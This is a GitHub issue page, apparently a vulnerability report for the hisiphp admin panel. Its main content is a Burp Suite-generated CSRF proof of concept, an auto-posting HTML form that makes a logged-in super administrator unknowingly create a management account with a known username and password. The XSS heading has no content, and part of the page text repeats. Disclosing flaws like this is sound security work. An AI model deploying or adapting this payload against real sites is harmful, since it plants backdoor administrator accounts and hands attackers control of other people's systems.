Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
XSS:
CSRF:
poc:
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/hisiphp-master/hisiphp-master/admin.php/admin/user/adduser.html" method="POST"> <input type="hidden" name="role_id" value="2" /> <input type="hidden" name="username" value="yonghu" /> <input type="hidden" name="nick" value="yonghu" /> <input type="hidden" name="password" value="yonghu111" /> <input type="hidden" name="password_confirm" value="yonghu111" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="id" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
When the super administrator accesses, a tyonghu management account will be added in the background.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
XSS:
CSRF:
poc:
When the super administrator accesses, a tyonghu management account will be added in the background.
The text was updated successfully, but these errors were encountered: